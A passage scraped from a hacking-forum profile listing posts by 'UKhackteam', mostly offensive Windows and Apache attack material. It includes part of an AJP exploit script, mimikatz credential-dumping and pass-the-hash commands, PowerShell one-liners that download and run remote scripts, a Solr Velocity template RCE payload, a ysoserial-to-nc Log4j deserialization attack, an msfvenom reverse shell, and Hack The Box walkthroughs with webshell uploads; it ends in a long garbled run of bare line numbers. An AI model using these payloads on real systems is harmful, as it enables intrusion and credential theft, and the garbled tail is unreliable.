stream): rlen,=unpack(stream, 'H') return rlen @staticmethod def receive(stream): r=AjpResponse() r.parse(stream) Return r import socket def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET): fr=AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER) fr.method=method fr.protocol='HTTP/1.1' fr.req_uri=req_uri fr.remote_addr=target_host fr.remote_host=None fr.server_name=target_host fr.server_port=80 fr.request_headers={ 'SC_REQ_ACCEPT': 'text/html',
  15. UKhackteam

    Title: Intra-Domain Horizontal Movement Analysis

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    域内横向移动分析 常用 Windows 远程连接和相关命令 IPC 1 net use \\IP\ipc$ 'password' /user:Administrator IPC 的利用条件 Open Port 139 The administrator has enabled the default sharing 使用 Windows 自带的工具获取远程主机信息 dir 命令 1 dir \\IP\c$ tasklist 命令 1 tasklist /S IP /U administrator /P password 计划任务 at 命令 Mainly in Windows server before 2008 version 查看目标系统时间 1 net time \\IP 将 payload 复制到目标系统中 1 copy payload.bat \\IP\C$ 使用 at 命令创建计划任务 1 at \\IP 8:00AM C:\payload.bat Return a scheduled task ID 清除 at 记录 1 at \\IP taskID /delete Use at to save the execution result to the remote and read the result: 1 at \\IP 8:00AM cmd.exe /c 'ipconfig C:/1.txt' 1 type \\IP\C$\1.txt schtask 命令 建立 IPC 连接 创建名为 task 的计划任务 1 schtask /create /s IP /tn test /sc onstart /tr c:\payload.bat /ru system /f 执行该计划任务 1 schtask /run /s IP /i /tn 'test' 删除计划任务 1 schtask /delete /s IP /tn 'test' /f Windows 系统散列值获取 单机密码抓取 GetPass 1 GetPassword_x64.exe PwDump7 1 PwDump7.exe 通过 SAM 和 SYSTEM 文件抓取密码 导出 SAM 和 System 文件 1 2 reg save hklm\sam sam.hive reg save hklm\system system.hive 通过读取 SAM 和 System 文件获得 NTLM Hash mimikatz 1 lsadump:sam /sam:sam.hive system:system.hive cain The target machine uses mimikatz to directly read local SAM files 1 2 privilege:debug lsadump:sam 使用 mimikatz 在线读取 SAM 文件 1 mimikatz.exe 'privilege:debug' 'log' 'sekurlsa:loginpasswords' 使用 mimikatz 离线读取 lass.dmp 文件 导出 lass.dmp 文件 Export lsass.dmp file using Task Manager The task manager finds the lsass.exe process, right-click, and select the "Create Dump File" option. Export lsass.dmp file using Procdump Microsoft officially released tools, free of killing 1 Procdump.exe -accepteula -ma lsass.exe lsass.dmp 使用 mimikatz 导出 lsass.dmp 文件中的密码值 1 2 sekurlsa:mimidump lsass.dmp sekurlsa:logonpasswords full 使用 Powershell 对散列值进行 Dump 操作 1 Import-Module .\Get-PassHashes.ps1 使用 Powershell 远程加载 mimikatz 抓取散列值和明文密码 1 powershell 'IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PwoerSploit/master/Exfilration/Invoke-Mimikatz.ps1');Invoke-Mimikatz' 哈希传递攻击 使用 NTLM Hash 进行哈希传递 1 mimikatz 'privilege:debug' 'sekurlsa:pth /user:administrator /domain:pentest.hacker /ntlm:[NTLM]' 使用 AES-256 密钥进行哈希传递 Crawl AES-256 Key with mimikatz 1 mimikatz 'privilege:debug' 'sekurlsa:ekeys' pth attack (the target machine must be installed KB2871997) 1 mimikatz 'privilege:debug' 'sekurlsa:pth /user:administrator /domain:pentest.hacker /aes256:[aes256]' 票据传递 使用 mimikatz 进行票据传递 导出票据 1 mimikatz 'privilege:debug' 'sekurlsa:tickets /exports' 注入票据 1 mimikatz 'kerberos:ptt' 'C:\xxx.kirbi' 使用 kekeo 进行票据传递 生成票据文件 1 kekeo 'tgt:ask /user:administrator /domain:pentest.hack /ntlm:[NTLM]' 将票据文件导入内存 1 kekeo 'kerberos:ptt xxx.kirbi' PsExec 的使用 PsTools 工具中的 PsExec 建立 IPC 连接 1 net use \\IP\ipc$ 'password' /u:administrator 获取 System 权限的 交互式shell 1 2 3 PsExec.exe -accepteula \\IP -s cmd.exe or PsExec.exe -accepteula \\IP -s cmd.exe /c ipconfig If the -s command is not used, create a shell with Administrator permissions If no IPC connection is established: 1 PsExec.exe -accepteula \\IP -u administrator -p password -s cmd.exe Metasploit 中的 psexec 模块 exploit/windows/smb/psexec exploit/windows/smb/psexec_psh (powershell version) WMI 的使用 基本命令 1 wmic /node:IP /user:administrator /password:passed process call create 'cmd.exe /c ipconfig ip.txt' After establishing an IPC connection, use the type command to read the result: 1 type \\IP\C$\ip.txt impacket 包中的 wmiexec 1 wmiexec.py administrator:password@IP wmiexec.vbs Semi-interactive shell 1 cscript.exe //nologo wmiexec.vbs /shell IP administrator password Execute a single command 1 cscript.exe wmiexec.vbs /cmd IP administrator password 'ipconfig' For commands with longer run times, such as ping and systeminfo, the -wait 5000 command or longer wait time is required. When running nc, etc. which does not require output orders, you need to wait for running, the -persist parameter is required. Invoke-WmiCommand in powersploit toolkit Import Invoke-Wmicommand.ps1 into the system 1 2 3 4 5 6 7 8 9 $User='pentest.hacker\administrator' $Password=ConvertTo-SecureString -String 'password' -AsPlainText -Force $Cred=New-Object -TypeName System.Management.AutoMation.PSCredential -ArgumentList $User, $Password $Remote=Invoke-WmiCommand -Payload {ipconfig} -Credential $Cred -ComputerName IP $Remore.PayloadOutput Invoke-WMIMethod Use the Invoke-WMIMethod that comes with powershell, which is non-interactive and has no echo. 1 2 3 4 5 6 7 $User='pentest.hacker\administrator' $Password=ConvertTo-SecureString -String 'password' -AsPlainText -Force $Cred=New-Object -TypeName System.Management.AutoMation.PSCredential -ArgumentList $User, $Password $Remote=Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList 'calc.exe' -Credential $Cred -ComputerName IP 永恒之蓝漏洞 auxiliary/scanner/smb/smb_ms17_010 exploit/windows/smb/ms17_010_eternalblue smbexec C++ 版本 smbexec Upload execserver.exe to the C:\Windows\ directory of the target system, and lift UAC's restrictions on commands. 1 2 net use \\IP 'password' /user:pentest\administrator test.exe IP administrator password whoami c$ impacket 工具包中的 smbexec.py 1 smbexec.py penteer/administrator:password\@IP DCOM 在远程系统中的使用 通过本地 DCOM 执行命令 获取 DCOM 程序列表 windows server 2012 and above 1 Get-CimInstance Win32_DCOMApplicatioon Windows 7, Windows Server 2008 1 Get-WmicObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplication 使用 DCOM 执行任意命令 Locally start a powershell with administrator privileges 1 [System.Activator]:CreateInstance([type]:GetTypeFromProgID('MMC20.Application','127.0.0.1')).Document.ActiveView.ExecuteShellCommand('cmd.exe','0','/c calc.exe','Minimzed') 使用 DCOM 在远程机器上执行命令 You must use an account with local administrator privileges when connecting remotely 使用 IPC$ 连接远程计算机 1 net use \\IP 'password' /user:pentest.hacker\win7user 执行命令 调用 MMC20_Application 远程执行命令 1 2 $com=[Activator]:CreateInstance([type]:GetTypeFromProgID('MMC20.Application','IP')) $com.Document.ActiveView.ExecuteShellCommand('cmd.exe','0','/c calc.exe','Minimzed') 调用 9BA05972-F6A8-11CF-A442-00A0C90A8F39 1 2 3 4 $com=[Type]:GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39','IP') $obj=[System.Activator]:CreateInstance($com) $item=$obj.item() $item.Document.Application.ShellExecute('cmd.exe','/c calc.exe','c:\windows\system32','$null',0) SPN 在域环境中的使用 SPN 扫描 PowerShell-AD-Recon 利用 SPN 发现域中所有的 MSSQL 服务 1 2 Import-Module .\Discover-PSMSSQLServer.ps1 Discover-PSMSSQLServers 扫描域中所有的 SPN 信息 1 2 Import-Module .\Discover-PSInterestingServices.ps1 Discover-PSInterestingServices Without using third-party Powershell scripts, enter the following command to query all SPN information 1 setspn -T domain -q */* Exchange 邮件服务器攻击 Exchange 服务发现 基于端口扫描发现 1 nmap -A -O -sV IP SPN 查询 1 setspn -T pentest.hacker -F -Q */* Exchange 的基本操作 查看邮件数据库 1 2 add-pssnapin microsoft.exchange* Get-MailboxDatabase -server 'Exchange1' Specify the database and query it for details 1 Get-MailboxDatabase -Identify 'Mailbox Database 1894576043' | Format-List Name,EdbFilePath,LogFolderPath 获取现有用户的邮件地址 1 Get-Mailbox | format-tables Name, WindowsEmailAddress 查看指定用户的邮箱使用信息 1 Get-Mailboxstatistics -identify administrator | Select DisplayName,ItemCount,TotalItemSize,LastLogonTime 获取用户邮箱中的邮件数量 1 Get-Mailbox -ResultSize Unlimited | Get-MailboxStatistics | Sort-Object TotalItemSize -Decend 导出指定的电子邮件 配置用户的导入、导出权限 查看用户权限 1 Get-ManagementRoleAssignment -role 'Mailbox Import Export' | Format-List RoleAssigneeName 添加权限 1 New-ManagementRoleAssignment -Name 'Import Export_Domain Admins' -User 'Administrator' -Role 'Mailbox Import Export' 删除权限 1 New-ManagementRoleAssignment 'Import Export_Domain Admins' -Confirm:$false 设置网络共享文件夹 1 net share inetpub=c:\inetpub /grant:everyone,full 导出用户的电子邮件 1 New-MailboxExportRequest -Mailbox administrator -FilePath \\IP\inetpub\administrator.pst 管理导出请求 View previous export records 1 Get-MailboxExportRequest Delete the specified user's completed export request 1 Remove-MailboxExportRequest -Identify Administrator\mailboxexport Delete all requests that have been exported 1 Get-MailboxExportRequest -Status Completed | Remove-MailboxExportRequest
  16. UKhackteam

    Title: Permission enhancement defense analysis

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    权限提升防御分析 系统内核溢出漏洞提权 手动执行命令发现缺失补丁 1 2 systeminfo wmic qfe get Caption, Description, HotfixID, InstalledOn Discover patch number 1 wmic qfe get Caption,Description,HotfixID,InstalledOn | findstr C:'KB3143141' C:/'KB976902' Windows Exploit Suggester Use the systeminfo command to obtain the patch installation status of the current system and import the information into the patches.txt file. Update patch information 1 python windows-exploit-suggester.py --update Check for vulnerabilities 1 python windows-exploit-suggester.py -d 2019-02-02-mssb.xls -i patches.txt Metasploit built-in local_exploit_suggester module powershell 中的 sherlock 脚本 https://github.com/rasta-mouse/Sherlock 1 2 import-module .\Sherlock.ps1 Find-AllVulns https://github.com/rasta-mouse/Watson Windows 配置错误利用 系统服务权限配置错误 powerup https://github.com/PowerShellMafia/PowerSploit/tree/master/Privec 1 powershell.exe -exec bypass -Command '{Import-Module .\PowerUP.ps1;Invoke-AllChecks}' 1 powershell.exe -exec bypass -c 'IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowershellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks' metasploit 下的利用 Corresponding module service_permissions. 注册表键 AlwaysInstallElevated AlwaysInstallElevated is a policy setting. Microsoft allows unauthorized users to run installation files (MSI) with SYSTEM permissions. If the user enables this policy setting, hackers can use malicious MSI files to increase administrator rights. Assuming that we cannot obtain SYSTEM permissions through some conventional methods after getting the Meterpreter session of the target host, then the AlwaysInstallElevated privilege raising can bring us another idea. Manually detect the registry: 1 2 reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated If the values are all 1, there is a risk PowerUp Scripts 1 powershell.exe -exec bypass -c 'IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowershellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Get-RegistryAlwaysInstallElevated' Add an account 1 Write-UserAddMSI Run as a normal user 1 msiexec /q /i UserAdd.smi You can also use the always_install_elevated module in msf 可信任服务路径漏洞 metasploit 下的利用 Detect whether there is a vulnerability in the target machine 1 wmic service get name,displayname,pathname,startmode|findstr /i 'Auto' | findstr /i /v 'C:\Windows\\'|findstr /i /v ''' Rename and place the program to be uploaded in this vulnerable and writable directory, and execute the following command: 1 2 sc stop service_name sc start service_name You can also use the Windows Service Trusted Path Privilege Escalation module in msf for testing Note: msf To set set AutoRunScript migrate -f to prevent disconnection 自动安装配置文件 1 2 dir /b /s c:\Unattend.xml dir /b /s c:\sysprep.xml Check whether the encrypted password of base64 exists in the file The exploit module for this vulnerability is integrated in msf post/windows/gather/enum_unattend 计划任务 查看计划任务 1 schtasks /query /fo LIST /v 查询可写的计划任务文件夹 1 accesschk.exe -dqc 'C:\Microsoft' -accepteula 列出某个驱动器下所有权限配置有缺陷的文件夹 1 2 accesschk.exe -uwdqsUsersc:\ accesschk.exe -uwdqs'AuthenticatedUsers'c:\ 列出某个驱动器下所有权限配置有缺陷的文件 1 2 accesschk.exe -uwdqsUsersc:\*.* accesschk.exe -uwdqs'AuthenticatedUsers'c:\*.* Empire 内置模块 1 usermode privesc/powerup/xxxx 绕过 UAC 提权 bypassuac 模块 Prerequisite: The current user must be in the administrator group 1 2 3 exploit/windows/local/bypassuac exploit/windows/local/bypassuac_inject getsystem RunAs 模块 1 exploit/windows/local/ask A UAC box pops up, and a high-permission shell will pop back after the user clicks it. 1 getuid view permissions. If it is a normal user permission, execute getsystem to escalate permissions. Nishang 中的 Invoke-PsUACme 模块 1 2 3 4 Invoke-PsUACme -Verbose ## Use Sysprep method and execute the default Payload Invoke-PsUACme -method oobe -Verbose ## Use the oobe method and execute the default Payload Invoke-PsUACme -Payload 'powershell -windowstyle hidden -e YourEncodedPayload' ## Use the -Payload parameter to specify the Payload to be executed by yourself. Empire 中的 bypassuac 模块 bypassuac 模块 1 2 usemode privesc/bypassuac execute bypassuac_wscript 模块 1 2 usemode privesc/bypassuac_wscript execute 令牌窃取 msf 上的令牌窃取 Assume that the meterpreter shell has been obtained 1 2 use incognito list_tokens -u Call impersonate_token in incognito 1 impersonate_token DESKTOP-DUNPKQ9\\Administrator Note: When entering the hostname\username, you need to enter two backslashes Rotten Potato 本地提权 1 2 3 4 use incognito list_tokens -u execute -HC -f rottenpotato.exe impersonate_token 'NT AUTHORITY\\SYSTEM' 添加域管理员 Assuming that a domain-managed process is set up in the network, the process is migrated to the domain-managed process in the meterpreter shell 1 2 net user test test123!@# /ad /domain net group 'domain admins' test /ad /domain Similarly, in the meterpreter shell, you can use incognito to simulate a domain administrator and then add the domain administrator by iterating over all the authentication tokens available in the system. Execute the following command in the active meterpreter shell: 1 add_user test test!@#123 -h 1.1.1.2 Execute the following command to add the account to the domain administrator group. 1 add_user 'Domain Admins' test -h 1.1.1.2 Empire 下的令牌窃取分析 Run mimikatz and enter creds Execute : 1 pth CredID 无凭证下的权限获取 LLMNR 和 NetBIOS 欺骗攻击 Responder 工具 Turn on the monitoring mode
  17. UKhackteam

    Title: Apache Solr template injection remote code execution vulnerability

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    Apache Solr 模板注入远程代码执行漏洞 Apache Solr is a search server based on Lucene (a full-text search engine) from the Apache Software Foundation in the United States. Apache Velocity is a template engine that provides HTML page templates, email templates, and universal open source code generator templates. In multiple versions of Apache Solr, the configuration parameters of the VelocityResponseWriter feature of Apache Solr can be specified via HTTP requests, causing users to execute any command by injecting any Velocity template after setting specific parameters. 影响范围 5.0.0=Apache Solr=8.3.1 环境搭建 You can recreate the solr environment of vulhub 1 2 docker-compose up -d docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db Copy the jar package in contrib/velocity/lib that starts with velocity to server/solr-webapp/webapp/WEB-INF/lib/at : Restart the solr service. 漏洞复现 When the above environmental conditions are met, exploiting this vulnerability is divided into two steps. First set the key parameter params.resource.loader.enabled to true through an HTTP request, so that any template code can be specified from the user's HTTP request. Then execute any command by specifying any Velocity template code. Since Solr does not enable authentication by default, in this case, the exploit does not require login credentials. 1 2 3 4 5 6 7 8 9 10 { 'update-queryresponsewriter': { 'startup': 'lazy', 'name': 'velocity', 'class': 'solr.VelocityResponseWriter', 'template.base.dir': '', 'solr.resource.loader.enabled': 'true', 'params.resource.loader.enabled': 'true' } } Send payload: Visit: http://IP:8983/solr/test/select?q=1wt=velocityv.template=customv.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set( $str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1.$out.available()])$str.valueOf($chr.toChars($out.read()))%23end The return result of executing the id command: 修复建议 Upgrade to Apache Solr 8.4
  18. UKhackteam

    Title: Intranet penetration process

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    内网渗透流程 1 Initial Access Basic Web Vulnerability (weak password, file upload, file inclusion, RCE, deserialization) Various basic services 0/1/N Day RCE (vsftpd, Samba, fastcgi) Personal machine (fishing and cooking) Supply Chain Attack VPN, VNC, TV, etc. 0/1day 1.1 网络位置判断 Network Area DMZ Production Network Office network Host role judgment Operation and maintenance administrative … Connectivity judgment icmp 1.2 Proxy Online Test exe or ps1 TCP/UDP/HTTP/HTTPS/DNS/ICMP Port or Socket 1.3 Recon Work Group or Domain Domain Admin or !Admin Command or Secret File Host Discovery 1.3.1 浏览器历史及密码 Firefox Chrome … 1.3.2 RDP Logon event MSTSC history 1.3.3 凭据管理器 Web Credentials 1.3.4 信息收集 Agent Network Discovery 1.3.5 用户监控 Login Monitoring Drag monitoring
  19. UKhackteam

    Title: CVE-2019-12409 Vulnerability recurrence

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    Apache Solr CVE-2019-12409 RCE 漏洞复现 This vulnerability stems from the security risk of the ENABLE_REMOTE_JMX_OPTS configuration option in the default configuration file solr.in.sh. If you use the default solr.in.sh file in the affected version, JMX monitoring is enabled and exposed to RMI_PORT (default=18983) and no authentication is required. If inbound traffic in the firewall has this port turned on, anyone with Solr node network access will be able to access JMX and can upload malicious code to execute on the Solr server. This vulnerability does not affect users of Windows systems, but only affects some versions of Linux users. 环境搭建 Write to the docker-compose.yml file: 1 2 3 4 5 6 7 version: '2' services: solr: image: vulhub/solr:8.1.1 ports: - '8983:8983' - '18983:18983' Running vulnerability environment: 1 2 docker-compose up -d docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db Check whether the vulnerability configuration is enabled in the Docker target machine environment: 1 2 3 docker ps -a #View the CONTAINER ID of the currently running container docker exec -it CONTAINER ID /bin/bash #docker's solr configuration file is in /etc/default by default cat /etc/default/solr.in.sh |grep true #The vulnerability configuration is enabled as shown in the figure below Browser access: http://IP:8983 to view the Apache solr's management page without logging in. 漏洞复现 Open msf and configure payload Setting up attacker and victim IP implement
  20. UKhackteam

    Title: Apache Log4j SocketServer deserialization vulnerability recursive

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    Apache Log4j SocketServer 反序列化漏洞复现 Apache Log4j is a Java-based logging tool. It is a project of the Apache Software Foundation and one of several Java logging frameworks. Recently, Apache Log4j officially disclosed that there is a deserialization vulnerability (CVE-2019-17571) in the SocketServer class in version 1.2.x. The attacker can exploit the vulnerability to realize remote code execution. The org.apache.log4j.net.SocketServer class in the Log4j 1.2.x version has a deserialization vulnerability. When the Socket listening service created using the Log4j SocketServer class processes accepted data, it is easy to deserialize untrusted data. Combined with the deserialization widget, attackers can implement remote code execution. 环境搭建 jar package : 1 java -cp log4j-1.2.17.jar:commons-collections-3.1.jar org.apache.log4j.net.SocketServer 8888 ./log4jserver.properties ./ 漏洞复现 1 java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 'open -a Calculator' | nc 127.0.0.1 8888 After sending the payload, the calculator pops up successfully: 修复建议 The 1.2 series version of Apache Log4j was officially suspended in August 2015. The vulnerability has been fixed in version 2.8.2. It is recommended to upgrade to version 2.8.2 or higher as soon as possible; Download address: https://logging.apache.org/log4j/2.x/download.html Stop creating Socket service using the Log4j SocketServer class. The functions of the SocketServer class that does not use Log4j are not affected by vulnerabilities;
  21. UKhackteam

    Title: Apache Flink Arbitrary Jar package upload results in RCE vulnerability

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    Apache Flink 任意 Jar 包上传导致 RCE 漏洞 Apache Flink is a distributed big data processing engine that performs stateful calculations on finite and infinite data streams. It can be deployed in various cluster environments to perform rapid calculations of data sizes of various sizes. ApacheFlink is an open source stream processing framework developed by the Apache Software Foundation, with its core being a distributed streaming data streaming engine written in Java and Scala. Flink executes arbitrary streaming data programs in data parallelism and pipeline modes. Flink's pipeline runtime system can execute batch and streaming programs. In addition, the Flink runtime itself also supports the execution of iterative algorithms. An attacker can use this vulnerability to upload any Jar package in the Apache Flink Dashboard page, and use Metasploit to execute arbitrary code in the Apache Flink server to obtain the highest permissions of the server, so it is more harmful. 影响范围 Apache Flink=1.9.1 环境搭建 Download Apache Flink 1.9.1 package: 1 wget http://mirrors.tuna.tsinghua.edu.cn/apache/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz Unzip the installation package: 1 tar –zxvf flink-1.9.1-bin-scala_2.11.tgz Enter the bin directory and start Flink: 1 ./start-cluster.sh Browser access: http://IP:8081 漏洞复现 msf generates a reverse shell horse 1 msfvenom -p java/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f jar shell.jar msf set listening 1 2 3 use exploit/multi/handler set payload java/shell/reverse_tcp expolit Upload shell.jar and submit The rebound shell 修复建议 Upgrade Apache Flink to the latest version
  22. UKhackteam

    Title: Hack The Box —— Mirai

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    Hack The Box —— Mirai 信息搜集 nmap 1 nmap -T4 -A -v 10.10.10.48 get: The server has TCP ports 53, 80, and 22 open. Access port 80, which is a blank page. 目录爆破 1 python3 dirsearch.py -u http://10.10.10.48/-e html -t 20 get: Discover the admin directory. Visit, get: Search for relevant information and found that it is a service built on a Raspberry Pi 漏洞利用 Try to log in with the Raspberry Pi default password, search for relevant information, and find that the default password of the Raspberry Pi is as follows: Try to log in: 1 ssh [email protected] Login was found to be successful: Directly cat /home/pi/user.txt to get the first flag. Use the sudo -l command to view the permissions that can be executed at the moment: Discover all commands that can be executed without a password, and directly switch to the root user with sudo su. Directly cat /root/root.txt to find the following information: Try to see which devices are mounted on the current system: 1 df -lh Found that the /dev/sdb device is mounted under /media/stick: 方法一 Directly use the strings command to obtain all strings in the device: 1 strings /dev/sdb Get a string that is suspected to be a flag, and after submitting it, it is found to be correct. 方法二 Extract usb image using dd command : 1 dcfldd if=/dev/sdb of=/home/pi/usb.dd Then, analyze the mirror content: 1 binwalk usb.dd Three files were found to exist. Use binwalk to extract files: 1 binwalk -Me usb.dd View the original file and get flag
  23. UKhackteam

    Title: Hack The Box —— Bank

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    Hack The Box —— Bank 信息搜集 nmap 1 nmap -T4 -A -v 10.10.10.29 It was found that the 22, 80, TCP ports 53 are open, and the DNS service is opened on port 53. Usually, DNS services are open on UDP port 53 and DNS services are open on TCP, which generally has zone transmission function, so it is suspected that it has a DNS zone transmission vulnerability. Accessing port 80 is a default page for apache. Usually, this server with DNS on and then directly accessing port 80 is used as a virtual host. DNS 信息查询 First, I tested localhost and 10.10.10.29, and found no valuable information. Then I tried to guess bank.htb (I only found out after reading WP). I found that the domain name can be parsed by the DNS service, so I used the dig tool for further testing. 1 dig axfr bank.htb @10.10.10.29 Successfully exploited the regional transmission vulnerability to obtain the subdomain of the bank.htb domain name. 漏洞发掘 Set the attacker's DNS server to 10.10.10.29, and then visit www.bank.htb to get: Then use the dirsearch tool to perform directory blasting: I found that the uploaded directory, index.php, support.php, but the page sizes of index.php and support.php are different, but they directly redirect to login.php 302. I suspect that index.php and support.php have other secrets. Use the function of burpsuite to rewrite the response header to cancel the redirection, and change 302 to 200. Access to get index.php, support.php: There is an upload point for support.php, but after trying, the restrictions were not bypassed and further testing was carried out. During the process of directory blasting, the balance-transfer directory was discovered, and after accessing it, we got: Open any file and find that it is suspected to be an encrypted log. Therefore, I try to find the file that failed to encrypt, and then obtain the plaintext of the user name and password. First download all files locally: 1 wget -r http://www.bank.htb/balance-transfer Then enter the balance-transfer directory, delete index.html* and other files, and sort them in size: 1 wc -c *.acc | sort -n I found a particularly small file and after accessing it, I got: Log in with the obtained account and password: I discovered the upload page again, and at the same time, the upload page uses the previous support.php. Right-click to view the source code of the current page and find a vulnerability left by debug: Upload the webshell directly, named xxx.htb, and connect to the kitchen knife: Check user.txt to get the first flag. Whoami View permissions, find that the permissions are insufficient, and try to raise the permissions. Upload the LinEnum.sh script and execute it to get some auxiliary information. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 twenty one twenty two twenty three twenty four 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656 657 658 659 660 661 662 663 664 665 666 667 668 669 670 671 672 673 674 675 676 677 678 679 680 681 682 683 684 685 686 687 688 689 690 691 692 693 694 695 696 697 698 699 700 701 702 703 704 705 706 707 708 709 710 711 712 713 714 715 716 717 718 719 720 721 722 723 724 725 726 727 728 729 730 731 732 733 734 735 736 737 738 739 740 741 742 743 744 745 746 747 748 749 750 751 752 753 754 755 756 757 758 759 760 761 762 763 764 765 766 767 768 769 770 771 772 773 774 775 776 777 778 779 780 781 782 783 784 785 786 787 788 789 790 791 792 793 794 795 796 797 798 799 800 801 802 803 804 805 806 807 808 809 810 811 812 813 814 815 816 817 818 819 820 821 822 823 824 825 826 827 828 829 830 831 832 833 834 835 836 837 838 839 840 841 842 843 844 845 846 847 848 849 850 851 852 853 854 855 856 857 858 859 860 861 862 863 864 865 866 867 868 869 870 871 872 873 874 875 876 877 878 879 880 881 882 883 884 885 886 887 888 889 890 891 892 893 894 895 896 897 898 899 900 901 902 903 904 905 906 907 908 909 910 911 912 913 914 915 916 917 918 919 920 921 922 923 924 925 926 927 928 929 930 931 932 933 934 935 936 937 938 939 940 941 942 943 944 945 946 947 948 949 950 951 952 953 954 955 956 957 958 959 960 961 962 963 964 965 966 967 968 969 970 971 972 973 974 975 976 977 978 979 980 981 982 983 984 985 986 987 988 989 990 991 992 993 994 995 996 997 998 999 1000 1001 1002 1003 1004 1005 1006 1007 1008 1009 1010 1011 1012 1013 1014 1015 1016 1017 1018 1019 1020 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1101 1102 1103 1104 1105 1106 1107 1108 1109 1110 1111 1112 1113 1114 1115 1116 1117 1118 1119 1120 1121 1122 1123 1124 1125 1126 1127 1128 1129 1130 1131 1132 1133 1134 1135 1136 1137 1138 1139 1140 1141 1142 1143 1144 1145 1146 1147 1148 1149 1150 1151 1152 1153 1154 1155 1156 1157 1158 1159 1160 1161 1162 1163 1164 1165 1166 1167 1168 1169 1170 1171 1172 1173 1174 1175 1176 1177 1178 1179 1180 1181 1182 1183 1184 1185 1186 1187 1188 1189 1190 1191 1192 1193 1194 1195 1196 1197 1198 1199 1200 1201 1202 1203 1204 1205 1206 1207 1208 1209 1210 1211 1212 1213 1214 1215 1216 1217 1218 1219 1220 1221 1222 1223 1224 1225 1226 1227 1228 1229 